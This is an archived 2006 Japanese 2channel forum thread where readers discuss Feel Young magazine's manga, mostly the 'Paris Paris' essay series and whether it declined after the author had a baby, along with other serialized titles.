123 :花と名無しさん:2006/12/20(水) 21:23:50 ID:???0
パリパリ評判いいんだね。
すんごいつまんなくなってると思うけど。
子供生まれたらさらにつまんなくなった。予想通りだけど。
インドとかの頃が最強だったのになあ。

124 :花と名無しさん:2006/12/20(水) 22:31:01 ID:???0
テーマが全く別のものと比べてもw

125 :花と名無しさん:2006/12/20(水) 22:49:32 ID:???0
まあ、パリパリも初期より面白くなくなったのは感じる
ゲコとか出てきた時はどうしようかと思った
でも今月は面白かったかも

126 :花と名無しさん:2006/12/20(水) 23:30:43 ID:???O
パリパリにさえ不満を抱く人は、いったいフィーヤンの何がお気に入りなんだい?
もしかしてエリカ儲かい?

127 :花と名無しさん:2006/12/21(木) 00:01:20 ID:???0
>>126
合う合わないや個人の嗜好もあるし、
パリパリが不満でも別に良いんじゃない?
パリパリ不満=フィーヤン全体的にNGってわけでもないだろうしね。
賛否両論あって良いかと。

賛否両論といっても、主に「否」で構成されてそうな
春菊他が載り続けてるのは不思議だけど。
儲の支持が見込めるならいいのかな。

128 :花と名無しさん:2006/12/21(木) 00:27:04 ID:???0
>>126
そんな書き方したらパリパリへの不満厳禁みたいにとられかねないよ
それも怖い

129 :花と名無しさん:2006/12/21(木) 02:07:58 ID:???0
パリパリ、確かに赤子が産まれてから面白くなくなった…。
独特の人間観察と場所観察がウリだったから、行動範囲が制限される今は
しょうがないと思うけど。本人も子育て初めてだから、どこまでが外国体験で
どこまでが子育てにありがちな体験なのか、わからなくなってるんだろうね。

でも、もともとパリパリだけでフィーヤン読んでたわけではないので、普通に買ってますよ。

130 :花と名無しさん:2006/12/21(木) 09:21:41 ID:???0
かわかみじゅんこの普通のマンガはあまり好きじゃない。
絵はかわいいと思うんだけど、話に全然入り込めないなぁ。
不思議少女が主役、みたいなのが多くない?
ちょっと前に載ってたヤリマンの女の子の話も同情できなかった。

131 :花と名無しさん:2006/12/21(木) 12:07:33 ID:???0
自分は普通のマンガの方が好きだな

>>125
無碍にしたら叩かれるから仕方ないよ

132 :花と名無しさん:2006/12/21(木) 18:02:37 ID:???O
>>65からのレス見て表紙をしげしげと見てみたら、
ダウンタウン松ちゃんの「パーティ行かなあかんねん」
のネタ(ベンジャミンだっけ?)を思い出した。

133 :花と名無しさん:2006/12/21(木) 18:04:22 ID:???0
パーティー行かなあかんねんはMr.ベイターだりろ

134 :花と名無しさん:2006/12/21(木) 18:20:23 ID:???O
なんでミカリン笑エッセイに第三子出てこないの?

135 :花と名無しさん:2006/12/21(木) 18:23:34 ID:???0
>>134
いねーよ

136 :花と名無しさん:2006/12/22(金) 00:47:20 ID:???O
3分で突っ込まれてその後スレが止まってる様にワロタ

137 :花と名無しさん:2006/12/22(金) 09:06:05 ID:???0
つうか、誰と勘違いしてんのかな?

138 :花と名無しさん:2006/12/22(金) 10:53:01 ID:???0
先月号か先々号に、
「うちには実は3人子供がいる」って書いてあったのは、
多分夫のことだろーとオモタ。
大きい子供って意味?

夫の甘やかしっぷりが確かに子供に対するそれと同じかも。


139 :花と名無しさん:2006/12/23(土) 21:12:09 ID:R44Y+X5k0
http://human5.2ch.net/test/read.cgi/ms/1164089605/

の569が付き庫を思い出させてくれて目頭が・・・

140 :花と名無しさん:2006/12/26(火) 10:51:07 ID:???0
>>139
一気に読んじゃったよ
おもろかったw

141 :花と名無しさん:2006/12/26(火) 17:40:58 ID:???0
こないだ全然関係ないサイト見てて「僕の尊敬する人云々」とか書いてあったリンクから飛んだら
タカギズムが出てきてビビッタ

142 :花と名無しさん:2006/12/27(水) 16:30:40 ID:???0
憑き子テンテー最近見ないと思ったら…
あんなところでご活躍だったとはw
面白かった!ありがとう>>139!!



143 :花と名無しさん:2006/12/27(水) 18:48:33 ID:0vuK0F9s0

ふむ

144 :花と名無しさん:2006/12/29(金) 19:17:55 ID:LWrZXfH9O
サプリの渡辺キライ。よくあんな誰からも共感されない寒いキャラ描けるな。

145 :花と名無しさん:2006/12/29(金) 23:33:15 ID:???0
渡辺が田中とかと飲みに行くのが信じられない。
一般職と総合職の女ってつるまないよね。
(フリーと総合職ならまだわかるけど。)
代理店だから?

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)